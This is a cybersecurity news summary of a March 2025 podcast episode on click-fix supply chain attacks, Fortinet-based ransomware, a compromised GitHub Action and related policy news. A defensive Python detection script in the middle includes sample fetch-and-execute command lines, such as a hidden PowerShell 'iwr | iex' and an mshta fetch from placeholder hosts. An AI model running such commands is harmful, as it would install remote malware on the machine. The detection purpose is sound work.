In this episode of the CyberHub Podcast (Episode 880), recorded on Monday, March 17, 2025—coinciding with St. Patrick’s Day—host James Azar delves into a series of cybersecurity developments that highlight the rising threat of supply chain attacks, targeted espionage campaigns, and newly uncovered vulnerabilities in widely used products.
Below is a detailed, readable news-style summary of each story discussed.
One Hundred Car Dealership Websites Compromised
Over one hundred auto dealership websites were found hosting malicious “click-fix” code. Attackers compromised a third-party service, LES Automotive, which specializes in hosting dealership video content. This supply chain attack tricked visitors with a fake CAPTCHA or prompt that copied malicious commands to their clipboard.
Once pasted into a Windows Run prompt, the code initiated a malware download. This technique, employed by both criminal gangs and advanced persistent threat groups (APTs), demonstrates how tools such as CAPTCHAs can be turned against unsuspecting users. Security professionals are reminded that heightened vigilance and monitoring are crucial to mitigating these increasingly sophisticated attacks.
Denmark’s Cybersecurity Agency Warns Telecom Sector
The Danish Cybersecurity Agency issued an alert about state-sponsored espionage campaigns targeting telecommunications infrastructure in Europe. The announcement appears linked to “Salt Typhoon,” a wide-ranging campaign by Chinese threat actors who have already impacted organizations in the United States, Asia, and Europe.
This revelation underscores the Chinese modus operandi of reusing proven exploits globally. Security teams in multinational organizations must acknowledge that geopolitical tension frequently spills over into cyberspace, making robust defense measures against espionage campaigns a high priority.
‘SuperBlack’ Ransomware Exploits Fortinet Flaws
Researchers at Forescout Vedere Labs discovered that attackers are exploiting two critical CVEs in Fortinet’s FortiOS firewalls (CVE-2024-55591 and CVE-2025-24472) to deploy a ransomware strain called “SuperBlack.” By chaining these vulnerabilities, attackers can escalate privileges to “super admin” level and then install the ransomware.
The campaign, traced to a group known as “Mora_001” with links to LockBit, followed rapidly on the publication of proof-of-concept exploits. Thousands of exposed FortiGate firewalls remain at risk, making immediate patching an urgent matter.
NVIDIA’s AI Riva Vulnerabilities
NVIDIA released critical updates to address security flaws in its Riva AI services platform. Riva, which enables multilingual speech recognition and translation, was found to have two improper access control vulnerabilities (CVE-2025-23242 and CVE-2025-23243). Exploiting these flaws could allow attackers to escalate privileges, alter data, and even cause denial-of-service conditions. Administrators are urged to update Riva to version 2.19.0 or higher to eliminate the risk of unauthorized access and data tampering.
Popular GitHub Action “change-files” Compromised
A GitHub Action named “tj-actions/changed-files,” used by more than 23,000 repositories, was compromised in another supply chain breach. Threat actors modified the code to insert a malicious Python script that attempted to steal Continuous Integration/Continuous Deployment (CI/CD) secrets.
While there is no direct evidence of widespread exploitation or data exfiltration, the incident is a stark reminder to carefully manage and monitor secrets and tokens in any CI/CD environment.
New Decrypter for Akira Ransomware
A security researcher, after weeks of effort and GPU-based brute forcing, released a working decrypter for the Linux variant of Akira ransomware. Leveraging the fact that Akira’s encryption key relies on timestamps, the decrypter uses GPU power to systematically crack each file’s unique encryption key.
Though it is not a simple turnkey tool—because it individually brute forces files—it offers vital relief for organizations hit by Akira without forcing them to pay a ransom.
Phishing Campaign Impersonating Booking.com
A phishing campaign designed to resemble legitimate messages from Booking.com has been targeting the hospitality industry across North America, Europe, and Southeast Asia. Using the same “click-fix” malware execution trick, threat actors prompt victims to solve a CAPTCHA-like challenge, then paste malicious code into a Windows Run dialog, installing malware strains such as XWorm, Lumma Stealer, and NetSupport RAT.
Booking.com itself has not been breached; the scam relies on brand impersonation, which underscores the ongoing necessity for user training and robust email filtering.
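Both click-fix stories above (the dealership sites and the Booking.com lure) share one telemetry signature: a script host launched by the Run dialog, whose parent process is explorer.exe, with a command line that downloads or evaluates code. The triage filter below is an added example (not from the podcast or the cited reports) run over constructed Sysmon-style process-creation records; the `example.invalid` URLs and file names are placeholders.

```python
# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://example.invalid/a | iex"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/b"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\PowerShell\7\pwsh.exe",  # admin shell, not the Run dialog
     "CommandLine": "powershell.exe -File deploy.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Script hosts that click-fix lures typically ask the victim to paste into Win+R.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# Markers of remote fetch, in-memory evaluation, or window hiding in the command line.
SUSPICIOUS = ("http://", "https://", "iex", "invoke-expression", "iwr", "irm",
              "downloadstring", "-enc", "hidden")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_candidate(event):
    """True when a script host is started directly by explorer.exe (how the Run dialog
    launches programs) with a command line carrying download/eval/hide markers.
    explorer.exe also parents Start-menu launches, so treat hits as triage leads."""
    if basename(event["ParentImage"]) != "explorer.exe":
        return False
    if basename(event["Image"]) not in INTERPRETERS:
        return False
    cmd = event["CommandLine"].lower()
    return any(marker in cmd for marker in SUSPICIOUS)


def triage(events):
    """Return the command lines of all events that match the click-fix pattern."""
    return [e["CommandLine"] for e in events if is_clickfix_candidate(e)]


if __name__ == "__main__":
    for cmd in triage(SAMPLE_EVENTS):
        print("click-fix candidate:", cmd)
```

The same logic maps onto a SIEM rule (Sysmon Event ID 1, ParentImage ends with explorer.exe, Image in the interpreter list, CommandLine contains a marker); a preventive companion is blocking the Run dialog for standard users via Group Policy where the business allows it.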
Google and UK Government Encryption Orders
A bipartisan group of US lawmakers has raised concerns over a secret British court order that may force technology firms like Google to compromise encryption. Google has refused to confirm or deny receiving such an order, fueling speculation that the UK government is demanding a “backdoor” into encrypted communications.
Similar demands have been a point of contention with Apple in the UK. This situation highlights the tension between law enforcement, which seeks access to potentially vital data, and privacy advocates who warn against weakening encryption.
FCC’s Council on National Security
FCC Commissioner Brendan Carr announced a new Council on National Security, aimed at safeguarding US telecom networks from foreign state-sponsored threats, particularly from China. The council will coordinate regulatory enforcement, investigation, and oversight within the FCC across multiple bureaus.
It plans to mitigate vulnerabilities in 5G, satellite communications, quantum computing, and other emerging technologies. The move follows alarming reports of advanced intrusions, such as the Salt Typhoon incident, targeting sensitive political communications.
The council will have three main goals:
Reduce the U.S. telecom and technology sectors’ trade and supply chain dependence on foreign adversaries.
Mitigate vulnerabilities linked to cyberattacks, espionage and surveillance from foreign adversaries.
Help ensure the U.S. wins the strategic competition with China over critical technologies, including 5G, satellites, quantum computing, IoT and robotics.
Action Items
Patch and Update: Immediately apply security updates for Fortinet products and NVIDIA Riva to close known critical vulnerabilities.
Monitor Supply Chain Dependencies: Assess and audit third-party integrations (e.g., GitHub Actions, content-sharing platforms) to prevent compromise through vendor breaches.
Harden User Awareness: Train employees to identify and resist social engineering tactics like click-fix prompts and malicious CAPTCHA schemes.
Secure CI/CD Secrets: Implement robust secret management solutions, limiting privileges and monitoring logs for suspicious behavior.
Evaluate Ransomware Recovery: Familiarize your IT teams with available decrypters (e.g., for Akira) and test them in a safe environment.
Enable Multi-layered Telecom Security: For multinational organizations, prioritize protections against espionage and thoroughly review telecom infrastructure.
Stay Current on Encryption Laws: Track legislative and legal developments around encryption mandates in your operational regions.
Join the Conversation: Share insights within your networks, attend relevant events (such as CyberTech in Israel), and collaborate on security best practices.
✅ Story Links:
https://www.securityweek.com/100-car-dealerships-hit-by-supply-chain-attack/
https://therecord.media/europe-increased-cyber-espionage-telecoms-denmark-report
https://www.securityweek.com/nvidia-riva-vulnerabilities-allow-unauthorized-use-of-ai-services/
https://www.securityweek.com/popular-github-action-targeted-in-supply-chain-attack/
https://therecord.media/booking-phishing-hotels-malware-campaign
https://therecord.media/google-refuses-to-deny-it-received-uk-tcn
https://www.cybersecuritydive.com/news/fcc-national-security-council/742440/
Level Zero Conference Discount Code: L020RESPOND at www.levelzeroconference.com
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.